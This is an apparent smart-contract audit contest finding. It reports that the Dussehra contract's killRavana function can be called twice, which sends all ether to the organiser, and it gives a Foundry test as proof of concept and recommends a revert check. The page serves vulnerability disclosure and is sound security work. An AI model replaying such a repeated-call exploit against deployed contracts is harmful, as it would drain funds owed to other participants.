Submission Details
Severity:
`Dussehra::killRavana` function is called twice
Summary
If the Dussehra::killRavana function is called twice all the funds in the contract are sent to the organiser.
Vulnerability Details
The Dussehra::killRavana function when called sets IsRavanKilled to true and sends half the funds in the contract to the organiser, and the remaining half is given to the selected ram.
Code
function test_killRavanaTwice() public Moreparticipants {
vm.warp(1728691200 + 1);
vm.startPrank(organiser);
choosingRam.selectRamIfNotSelected();
vm.stopPrank();
vm.startPrank(player2);
dussehra.killRavana();
vm.stopPrank();
assertEq(dussehra.IsRavanKilled(), true);
assertEq(address(dussehra).balance, 1.5 ether);
vm.startPrank(player2);
dussehra.killRavana();
vm.stopPrank();
assertEq(address(dussehra).balance, 0);
}
Impact
If the Dussehra::killRavana function is called twice all the ether will be sent to the organizer and the selected ram will not get any ether.
Tools Used
Manual analysis
Recommendations
Add a check to the Dussehra::killRavana function so it will revert if IsRavanKilled is true.
Updates
Lead Judging Commences
bube about 1 year ago
Submission Judgement Published Assigned finding tags:
isRavanKilled is not checked
Rewards breakdown
nSLOC
218This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.